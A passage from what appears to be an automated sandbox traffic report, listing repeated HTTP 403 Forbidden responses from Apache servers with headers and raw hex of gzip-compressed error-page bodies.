ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00 Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:23 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00 Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:23 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00 Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 598content-encoding: gzipData Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 eb 6f db 36 10 ff 9e bf e2 ea c0 70 82 49 b6 9e 8e ed ca c6 ba b6 c3 f2 61 d8 d0 a4 1f b6 61 1f 68 e9 64 73 a1 44 8d a2 e3 b8 43 ff f7 1d 25 f9 a5 3a 29 6a 0c a3 ad 07 79 c7 1f 8f f7 e2 29 7a 95 c8 58 6f 0a 84 a5 ce c4 ec 22 32 0f 10 2c 5f 4c 3b 98 77 66 17 34 82 2c 99 5d 00 b5 28 43 cd 20 5e 32 55 a2 9e 76 56 3a b5 47 9d 43 52 ce 32 9c 76 1e 39 ae 0b a9 74 07 62 99 6b cc 89 75 cd 13 bd 9c 26 f8 c8 63 b4 ab 8e 05 3c e7 9a 33 61 97 31 13 38 75 2d 28 97 8a e7 0f b6 96 76 ca f5 34 97 27 a0 95 9c 4b 5d 1e 00 e7 92 e7 09 3e 59 90 cb 54 0a 21 d7 e6 8d a9 78 c9 1f 71 3b 5f 73 2d 70 f6 5e 29 a9 20 70 fc 68 50 0f d4 c4 52 6f b6 ef a6 99 ed 5b bb de 5c 26 1b f8 67 d7 ad 18 90 2f 96 7a 02 ae e3 74 5f 1f 51 aa 6d 9d 22 64 4c 2d 78 3e 01 e7 78 b8 60 49 c2 f3 c5 d1 f8 e7 dd db 4b 32 a4 b4 7b 3b 65 19 17 9b 09 d8 ac 28 04 da e5 a6 d4 98 59 f0 83 20 1d fe cc e2 bb aa ff 23 71 5a d0 b9 c3 85 44 f8 78 db b1 e0 83 d1 a0 b4 e0 27 14 8f a8 79 cc 2c 78 a3 c8 0c a4 7e 96 97 76 89 8a a7 34 e3 8d 01 85 b7 52 90 ce de 67 f2 2f de 39 80 39 31 72 b7 c9 e6 52 74 8e 77 38 67 f1 c3 42 c9 55 9e d8 b1 41 9a c0 b2 14 ec ca b1 c0 e9 5a 95 a2 e8 7e fd ec 1c 9e b1 05 4e 40 b1 c4 b8 c9 c2 3c c9 e6 57 4c 83 eb 77 61 3c a6 d9 15 9e 17 8e 8e 11 c1 29 c8 23 b4 a2 0d 15 4c d1 1c 08 9d ee b5 75 0a e9 c6 23 a4 e1 16 c9 f7 ce 06 1a dd 74 61 e8 6f 81 5c ef 7c a4 60 dc 85 30 dc 23 0d cf 46 0a dd 2e b8 c1 4e 4d ce f9 32 19 85 ef 44 f2 82 f3 81 7c 52 93 77 b3 d7 b7 bf 45 09 dc 6f 85 72 69 77 fe ce 74 9e 17 5a 70 63 0c e0 79 df 8a 34 0a bb 10 8c fe 13 a1 46 41 d7 ec f1 db 84 6a e5 05 59 52 62 94 94 30 14 0a a6 29 91 bd 98 1f 96 6e 2b 3b d8 6b 9c 3f 70 6d 1f 46 9f e0 c5 04 34 3e e9 d7 27 59 0d 85 92 ae 10 db 38 3d 90 f0 f9 90 7e 06 f4 2c b0 26 d6 29 79 21 53 7b 8d 92 e3 85 09 2e 2c b8 4c 7c c7 19 91 df 5d 3a a9 17 0c fd b6 ce ea 5c 4a 67 07 89 e4 f4 43 cc 5e d4 d9 a5 39 3f 18 ad a5 5a ba 6b 72 b8 ef 1c 02 98 b6 cb e1 c0 56 5a b6 b6 21 9f ec 72 c9 12 b9 26 93 2d e6 26 21 91 d9 f7 37 a7 5f 1b 1e dc e6 32 ef 3c a7 33 d4 aa f9 43 ca 88 e6 1a fb 86 d9 0b 6b ee b0 9a e2 98 bb ed 55 7e 53 31 9b ec 59 ff fb 7e cd e8 9b db b0 e2 33 af cf e9 78 02 97 69 9a 9e 76 80 b9 54 09 2a db a8 7d 55 4e 20 6c a3 d8 99 fc f4 55 a6 af d1 f7 8e cd e6 a5 14 2b 8d c7 f4 ca 78 61 fb f4 14 98 ea 13 c3 95 53 a5 52 65 8d 7f 51 a4 e0 95 1d 9a a8 b5 bf 8c a9 ca 27 99 e0 0b 5a 3c 26 c7 42 f5 a2 7f 7c 9f 21 45 36 c8 5c 6c a0 8c 15 62 0e 2c 4f e0 2a 63 4f 76 e3 22 81 31 cc 75 cb 7d 9e f5 2b d3 9a 89 23 a7 7b 44 fa 7c 96 20 3c df 0b e2 1a 41 da f2 8d 87 ff 87 7c 97 09 d5 66 5c 94 2d b8 26 f0 2f c7 a9 f9 1d 9b a2 2a 5e 4a fe 09 4d a0 8e da 71 b6 2b 8a 5c cc aa cb ab 9f 2f 9a 2b 96 09 9e 2a 91 ea 5
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:23 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 184Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 4e bb 0e 82 30 14 dd fb 15 57 16 27 b9 f8 18 9b 0e f2 88 24 a8 0c 75 70 2c b4 09 4d 80 92 b6 92 f8 f7 52 58 1c cf fb d0 5d f6 4c f9 bb ce e1 c6 ef 15 d4 af 6b 55 a6 10 1d 10 cb 9c 17 88 19 cf 36 e5 14 27 88 f9 23 62 84 76 7e e8 19 ed 94 90 0b f0 da f7 8a 5d 92 33 14 c6 36 5a 4a 35 52 dc 48 42 71 35 d1 c6 c8 6f c8 1d d9 9f 67 41 84 4e ec 6d 3e 20 cd b8 f7 d0 89 59 c1 a4 ec a0 9d d3 66 04 6f 40 b4 ad 72 0e 50 c8 41 8f da 79 2b bc b1 48 82 d8 69 07 4e d9 59 d9 98 e2 14 b6 d6 95 a5 37 bc 23 3f 3a 85 57 0e d8 00 00 00 Data Ascii: MN0W'$up,MRX]LkU6'#bv~]36ZJ5RHBq5ogANm> Yfo@rPAy+HiNY7#?:W
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 598content-encoding: gzipData Raw: 34 42 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 5b 73 e2 36 14 7e cf af 38 6b 86 01 a6 36 f8 82 09 10 c3 74 bb bb 9d e6 a1 d3 ce 26 fb d0 76 fa 20 6c d9 a8 91 2d 57 16 21 6c 67 ff 7b 8f 6c 73 73 08 99 30 9d 0a 7c 91 ce d1 a7 a3 73 d3 71 f0 2e 12 a1 da e4 14 96 2a e5 f3 ab 40 3f 80 93 2c 99 19 34 33 e6 57 38 42 49 34 bf 02 6c 41 4a 15 81 70 49 64 41 d5 cc 58 a9 d8 1a 1b 87 a4 8c a4 74 66 3c 32 ba ce 85 54 06 84 22 53 34 43 d6 35 8b d4 72 16 d1 47 16 52 ab ec 98 c0 32 a6 18 e1 56 11 12 4e 67 8e 09 c5 52 b2 ec c1 52 c2 8a 99 9a 65 e2 04 b4 14 0b a1 8a 03 e0 4c b0 2c a2 4f 26 64 22 16 9c 8b b5 7e 23 32 5c b2 47 ba 9d af 98 e2 74 fe 49 4a 21 61 68 7b c1 a0 1a a8 88 85 da 6c df 75 d3 db 37 77 bd 85 88 36 f0 cf ae 5b 32 50 96 2c d5 14 1c db 6e df 1c 51 ca 6d 9d 22 a4 44 26 2c 9b 82 7d 3c 9c 93 28 62 59 72 34 fe 6d f7 76 4e 86 18 77 6f c5 24 65 7c 33 05 8b e4 39 a7 56 b1 29 14 4d 4d f8 81 a3 0e 7f 26 e1 5d d9 ff 11 39 4d 30 ee 68 22 28 7c b9 35 4c f8 ac 35 28 4c f8 89 f2 47 aa 58 48 4c 78 2f d1 0c a8 7e 92 15 56 41 25 8b 71 c6 7b 0d 0a 1f 04 47 9d 7d 4a c5 5f cc 38 80 39 31 72 b7 49 17 82 1b c7 3b 5c 90 f0 21 91 62 95 45 56 a8 91 a6 b0 2c 38 e9 da 26 d8 6d b3 54 14 de 7b 2f ce 61 29 49 e8 14 24 89 b4 9b 24 fa 89 36 ef 12 05 8e d7 86 c9 04 67 97 78 ae 3f 3e 46 04 3b 47 8f 50 12 37 94 13 89 73 c0 b7 db 3d f3 14 d2 b5 8b 48 a3 2d 92 e7 5e 0c 34 be 6e c3 c8 db 02 39 ee e5 48 c3 49 1b 7c 7f 8f 34 ba 18 c9 77 da e0 0c 77 6a b2 2f 97 49 2b 7c 27 92 3b bc 1c c8 43 35 b9 d7 7b 7d 7b 5b 94 a1 f3 56 28 07 77 e7 ed 4c e7 ba be 09 d7 da 00 ae fb 56 a4 b1 df 86 e1 f8 3f 11 6a 3c 6c eb 3d be 4d a8 46 5e 10 05 26 46 81 09 43 52 4e 14 26 b2 b3 f9 61 e9 34 b2 83 b5 a6 8b 07 a6 ac c3 e8 e3 2c 9f 82 a2 4f ea e6 24 ab a6 60 d2 e5 7c 1b a7 07 12 be 1c d2 2f 80 5e 04 56 c7 3a 26 2f 4a e4 5e a3 e8 78 7e 44 13 13 5a 91 67 db 63 f4 bb 96 1d bb c3 91 d7 d4 59 95 4b f1 ec 40 91 ec be 4f d3 b3 3a 6b e9 f3 83 e0 5a b2 a1 bb 3a 87 7b f6 21 80 6e bb 1c 0e 64 a5 44 63 1b e2 c9 2a 96 24 12 6b 34 59 b2 d0 09 09 cd be bf d9 fd ca f0 e0 d4 97 7e 67 19 9e a1 66 c5 ef 63 46 d4 d7 c4 d3 cc ae 5f 71 fb e5 14 5b df 2d b7 f4 9b 92 59 67 cf ea df f7 2a 46 4f df 46 25 9f 7e 7d 49 c7 53 68 c5 71 7c da 01 16 42 46 54 5a 5a ed ab 62 0a 7e 13 c5 4a c5 d7 57 99 5e a3 ef 1d 9b 2c 0a c1 57 8a 1e d3 4b e3 f9 cd d3 93 d3 58 9d 18 2e 9d 2a 16 32 ad fd 0b 23 85 76 2d 5f 47 ad f5 3c a6 4a 9f 24 9c 25 b8 78 88 8e 45 e5 59 ff f8 3e a5 18 d9 20 32 be 81 22 94 94 66 40 b2 08 ba 29 79 b2 6a 17 19 6a c3 f4 1a ee f3 a2 5f e9 56 4f 1c db ed 23 d2 b7 8b 04 61 d9 5e 10 47 0b d2 94 6f 32 fa 3f e4 6b 45 58 9b 31 5e 34 e0 ea c0 6f 4d 62 fd 3b 36 45 59 bc 14 ec 2b d5 81 3a 6e c6 d9 ae 28 72 68 5a 5e 6e f5 3c 6b ae 50 44 f4 54 89 54 a
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 598content-encoding: gzipData Raw: 34 43 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 5b 73 e2 36 14 7e cf af 38 eb 0c 03 4c 6d f0 05 83 21 86 e9 76 77 3b cd 43 a7 9d 4d f6 a1 ed f4 41 d8 32 a8 91 2d 57 16 21 6c 67 ff 7b 8f 6c 73 73 08 99 30 9d 0a 7c 91 ce d1 a7 a3 73 d3 71 f8 2e 16 91 da e4 14 96 2a e5 b3 ab 50 3f 80 93 6c 31 35 68 66 cc ae 70 84 92 78 76 05 d8 c2 94 2a 02 d1 92 c8 82 aa a9 b1 52 89 15 18 87 a4 8c a4 74 6a 3c 32 ba ce 85 54 06 44 22 53 34 43 d6 35 8b d5 72 1a d3 47 16 51 ab ec 98 c0 32 a6 18 e1 56 11 11 4e a7 8e 09 c5 52 b2 ec c1 52 c2 4a 98 9a 66 e2 04 b4 14 73 a1 8a 03 e0 4c b0 2c a6 4f 26 64 22 11 9c 8b b5 7e 23 32 5a b2 47 ba 9d af 98 e2 74 f6 49 4a 21 61 60 7b 61 bf 1a a8 88 85 da 6c df 75 d3 db 37 77 bd b9 88 37 f0 cf ae 5b 32 50 b6 58 aa 09 38 b6 dd ba 39 a2 94 db 3a 45 48 89 5c b0 6c 02 f6 f1 70 4e e2 98 65 8b a3 f1 6f bb b7 73 32 24 b8 7b 2b 21 29 e3 9b 09 58 24 cf 39 b5 8a 4d a1 68 6a c2 0f 1c 75 f8 33 89 ee ca fe 8f c8 69 82 71 47 17 82 c2 97 5b c3 84 cf 5a 83 c2 84 9f 28 7f a4 8a 45 c4 84 f7 12 cd 80 ea 27 59 61 15 54 b2 04 67 bc d7 a0 f0 41 70 d4 d9 a7 54 fc c5 8c 03 98 13 23 77 9b 74 2e b8 71 bc c3 39 89 1e 16 52 ac b2 d8 8a 34 d2 04 96 05 27 1d db 04 bb 65 96 8a c2 7b f7 c5 39 2c 25 0b 3a 01 49 62 ed 26 0b fd 44 9b 77 88 02 c7 6b c1 78 8c b3 4b 3c d7 0f 8e 11 c1 ce d1 23 94 c4 0d e5 44 e2 1c f0 ed 56 d7 3c 85 34 72 11 69 b8 45 f2 dc 8b 81 82 51 0b 86 de 16 c8 71 2f 47 1a 8c 5b e0 fb 7b a4 e1 c5 48 be d3 02 67 b0 53 93 7d b9 4c 5a e1 3b 91 dc c1 e5 40 1e aa c9 1d ed f5 ed 6d 51 06 ce 5b a1 1c dc 9d b7 33 9d eb fa 26 8c b4 01 5c f7 ad 48 81 df 82 41 f0 9f 08 15 0c 5a 7a 8f 6f 13 aa 91 17 44 81 89 51 60 c2 90 94 13 85 89 ec 6c 7e 58 3a 8d ec 60 ad e9 fc 81 29 eb 30 fa 38 cb 27 a0 e8 93 ba 39 c9 aa 29 98 74 39 df c6 e9 81 84 2f 87 f4 0b a0 17 81 d5 b1 8e c9 8b 12 b9 d7 28 3a 9e 1f d3 85 09 d7 b1 67 db 01 fa dd b5 9d b8 83 a1 d7 d4 59 95 4b f1 ec 40 91 ec 9e 4f d3 b3 3a bb d6 e7 07 c1 b5 64 43 77 75 0e f7 ec 43 00 dd 76 39 1c c8 4a 89 c6 36 c4 93 55 2c 49 2c d6 68 b2 c5 5c 27 24 34 fb fe 66 f7 2a c3 83 53 5f fa 9d 65 78 86 9a 15 bf 8f 19 51 5f 63 4f 33 bb 7e c5 ed 97 53 6c 7d b7 dc d2 6f 4a 66 9d 3d ab 7f cf ab 18 3d 7d 1b 96 7c fa f5 25 1d 4f e0 3a 49 92 d3 0e 30 17 32 a6 d2 d2 6a 5f 15 13 f0 9b 28 56 2a be be ca f4 1a 7d ef d8 64 5e 08 be 52 f4 98 5e 1a cf 6f 9e 9e 9c 26 ea c4 70 e9 54 89 90 69 ed 5f 18 29 b4 63 f9 3a 6a ad e7 31 55 fa 24 e1 6c 81 8b 47 e8 58 54 9e f5 8f ef 53 8a 91 0d 22 e3 1b 28 22 49 69 06 24 8b a1 93 92 27 ab 76 91 81 36 4c b7 e1 3e 2f fa 95 6e f5 c4 c0 6e 1d 91 be 5d 24 08 cb f6 82 38 5a 90 a6 7c e3 e1 ff 21 df 75 8c b5 19 e3 45 03 ae 0e fc eb 71 a2 7f c7 a6 28 8b 97 82 7d a5 3a 50 83 66 9c ed 8a 22 87 a6 e5 e5 56 cf b3 e6 8a 44 4c 4f 95 48 d
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:23 GMTServer: ApacheX-Frame-Options: SAMEORIGINVary: Accept-EncodingContent-Encoding: gzipContent-Length: 194Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00 Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:23 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 194Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00 Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 598content-encoding: gzipData Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 75 60 38 41 25 5b 87 95 d8 5e d9 e8 76 77 8b e6 a1 68 b1 c9 3e b4 45 1f 28 69 64 b3 a1 44 95 a2 e3 78 8b fd ef 1d 4a f2 a5 38 09 d6 28 4a 5b 07 39 c3 8f c3 b9 38 0a df 24 32 d6 eb 02 61 a1 33 31 3b 0b cd 03 04 cb e7 d3 0e e6 9d d9 19 8d 20 4b 66 67 40 2d cc 50 33 88 17 4c 95 a8 a7 9d a5 4e ed 51 67 9f 94 b3 0c a7 9d 07 8e ab 42 2a dd 81 58 e6 1a 73 62 5d f1 44 2f a6 09 3e f0 18 ed aa 63 01 cf b9 e6 4c d8 65 cc 04 4e 5d 0b ca 85 e2 f9 bd ad a5 9d 72 3d cd e5 11 68 25 23 a9 cb 3d e0 5c f2 3c c1 47 0b 72 99 4a 21 e4 ca bc 31 15 2f f8 03 6e e6 6b ae 05 ce 3e 2a 25 15 0c 1d 3f 1c d4 03 35 b1 d4 eb cd bb 69 66 fb d6 b6 17 c9 64 0d ff 6c bb 15 03 f2 f9 42 4f c0 75 9c ee db 03 4a b5 ad 63 84 8c a9 39 cf 27 e0 1c 0e 17 2c 49 78 3e 3f 18 ff ba 7d 7b 49 86 94 76 6f a7 2c e3 62 3d 01 9b 15 85 40 bb 5c 97 1a 33 0b 7e 10 a4 c3 9f 59 7c 5b f5 7f 24 4e 0b 3a b7 38 97 08 9f 6f 3a 16 7c 32 1a 94 16 fc 84 e2 01 35 8f 99 05 ef 14 99 81 d4 cf f2 d2 2e 51 f1 94 66 bc 33 a0 f0 5e 0a d2 d9 c7 4c fe c5 3b 7b 30 47 46 6e d7 59 24 45 e7 70 87 11 8b ef e7 4a 2e f3 c4 8e 0d d2 04 16 a5 60 17 8e 05 4e d7 aa 14 45 f7 cb 67 e7 f0 8c cd 71 02 8a 25 c6 4d e6 e6 49 36 bf 60 1a 5c bf 0b e3 31 cd ae f0 bc 60 74 88 08 4e 41 1e a1 15 6d a8 60 8a e6 40 e0 74 2f ad 63 48 d7 1e 21 5d 6d 90 7c ef 64 a0 d1 75 17 ae fc 0d 90 eb 9d 8e 34 1c 77 21 08 76 48 57 27 23 05 6e 17 dc e1 56 4d ce e9 32 19 85 6f 45 f2 86 a7 03 f9 a4 26 ef 7a a7 6f 7f 83 32 74 bf 15 ca a5 dd f9 5b d3 79 5e 60 c1 b5 31 80 e7 7d 2b d2 28 e8 c2 70 f4 9f 08 35 1a 76 cd 1e bf 4d a8 56 5e 90 25 25 46 49 09 43 a1 60 9a 12 d9 8b f9 61 e1 b6 b2 83 bd c2 e8 9e 6b 7b 3f fa 04 2f 26 a0 f1 51 bf 3d ca 6a 28 94 74 85 d8 c4 e9 9e 84 cf 87 f4 33 a0 27 81 35 b1 4e c9 0b 99 da 69 94 1c 2f 48 70 6e c1 79 e2 3b ce 88 fc ee dc 49 bd e1 95 df d6 59 9d 4b e9 ec 20 91 9c 7e 80 d9 8b 3a 3b 37 e7 07 a3 b5 54 4b 77 4d 0e f7 9d 7d 00 d3 b6 39 1c d8 52 cb d6 36 e4 a3 5d 2e 58 22 57 64 b2 79 64 12 12 99 7d 77 73 fa b5 e1 c1 6d 2e f3 ce 73 3a 43 ad 9a 3f a0 8c 68 ae b1 6f 98 bd a0 e6 0e aa 29 8e b9 db 5e e5 37 15 b3 c9 9e f5 bf ef d7 8c be b9 5d 55 7c e6 f5 39 1d 4f e0 3c 4d d3 e3 0e 10 49 95 a0 b2 8d da 97 e5 04 82 36 8a 9d c9 2f af 32 bd 46 df 39 36 8b 4a 29 96 1a 0f e9 95 f1 82 f6 e9 29 30 d5 47 86 2b a7 4a a5 ca 1a ff a2 48 c1 0b 3b 30 51 6b 3f 8d a9 ca 27 99 e0 73 5a 3c 26 c7 42 f5 a2 7f 7c 9f 21 45 36 c8 5c ac a1 8c 15 62 0e 2c 4f e0 22 63 8f 76 e3 22 43 63 98 cb 96 fb 3c eb 57 a6 35 13 47 4e f7 80 f4 f5 24 41 78 be 13 c4 35 82 b4 e5 1b 5f fd 1f f2 9d 27 54 9b 71 51 b6 e0 9a c0 3f 1f a7 e6 77 68 8a aa 78 29 f9 17 34 81 3a 6a c7 d9 b6 28 72 31 ab 2e af 7e be 68 ae 58 26 78 ac 44 a
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 21 Dec 2023 04:03:23 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 194Content-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e b9 0e c2 30 10 44 7b 7f c5 42 43 45 36 1c a5 e5 02 12 04 52 38 8a 50 50 3a f1 4a b6 94 d8 96 6d 22 f8 7b 12 68 28 67 e7 ad de f0 59 71 dd d7 8f 5b 09 c7 fa 5c c1 ed be ab 4e 7b 98 2f 11 4f 65 7d 40 2c ea e2 d7 ac b3 1c b1 bc cc 05 e3 3a f5 9d e0 9a a4 1a 43 32 a9 23 b1 cd 37 70 70 a1 31 4a 91 e5 f8 3b 32 8e 5f 88 37 4e bd a7 bf 95 f8 63 c6 c4 b8 17 0f f7 04 e5 ec 22 81 96 03 81 a7 d0 9b 18 8d b3 90 1c c8 b6 a5 18 01 a5 ea 8d 35 31 05 99 5c 40 63 15 bd 32 af 3d 9b 28 6d 22 44 0a 03 85 8c a3 9f a4 5f dd 28 98 66 b2 0f 44 45 bb 81 e1 00 00 00 Data Ascii: M0D{BCE6R8PP:Jm"{h(gYq[\N{/Oe}@,:C2#7pp1J;2_7Nc"51\@c2=(m"D_(fDE
                                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 21 Dec 2023 04:03:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedvary: Accept-Encodingserver: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4retry-after: 598content-encoding: gzipData Raw: 34 43 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd 57 59 6f e3 36 10 7e cf af 98 55 60 d8 46 25 5b 87 e5 2b b2 d1 ed ee 16 cd 43 d1 62 93 7d 68 8b 3e 50 12 65 b3 a1 44 95 a2 e3 78 8b fd ef 1d 4a f2 a5 38 0e 62 14 a5 ad 83 9c e1 c7 e1 5c 1c 05 ef 62 11 a9 4d 4e 61 a9 52 3e bf 0a f4 03 38 c9 16 33 83 66 c6 fc 0a 47 28 89 e7 57 80 2d 48 a9 22 10 2d 89 2c a8 9a 19 2b 95 58 63 e3 90 94 91 94 ce 8c 47 46 d7 b9 90 ca 80 48 64 8a 66 c8 ba 66 b1 5a ce 62 fa c8 22 6a 95 1d 13 58 c6 14 23 dc 2a 22 c2 e9 cc 31 a1 58 4a 96 3d 58 4a 58 09 53 b3 4c 9c 80 96 22 14 aa 38 00 ce 04 cb 62 fa 64 42 26 12 c1 b9 58 eb 37 22 a3 25 7b a4 db f9 8a 29 4e e7 9f a4 14 12 06 b6 17 f4 ab 81 8a 58 a8 cd f6 5d 37 bd 7d 73 d7 0b 45 bc 81 7f 76 dd 92 81 b2 c5 52 4d c1 b1 ed d6 cd 11 a5 dc d6 29 42 4a e4 82 65 53 b0 8f 87 73 12 c7 2c 5b 1c 8d 7f db bd 9d 93 21 c1 dd 5b 09 49 19 df 4c c1 22 79 ce a9 55 6c 0a 45 53 13 7e e0 a8 c3 9f 49 74 57 f6 7f 44 4e 13 8c 3b ba 10 14 be dc 1a 26 7c d6 1a 14 26 fc 44 f9 23 55 2c 22 26 bc 97 68 06 54 3f c9 0a ab a0 92 25 38 e3 bd 06 85 0f 82 a3 ce 3e a5 e2 2f 66 1c c0 9c 18 b9 db a4 a1 e0 c6 f1 0e 43 12 3d 2c a4 58 65 b1 15 69 a4 29 2c 0b 4e 3a b6 09 76 cb 2c 15 85 f7 ee 8b 73 58 4a 16 74 0a 92 c4 da 4d 16 fa 89 36 ef 10 05 8e d7 82 c9 04 67 97 78 ae 3f 3e 46 04 3b 47 8f 50 12 37 94 13 89 73 c0 b7 5b 5d f3 14 d2 c8 45 a4 e1 16 c9 73 2f 06 1a 8f 5a 30 f4 b6 40 8e 7b 39 d2 60 d2 02 df df 23 0d 2f 46 f2 9d 16 38 83 9d 9a ec cb 65 d2 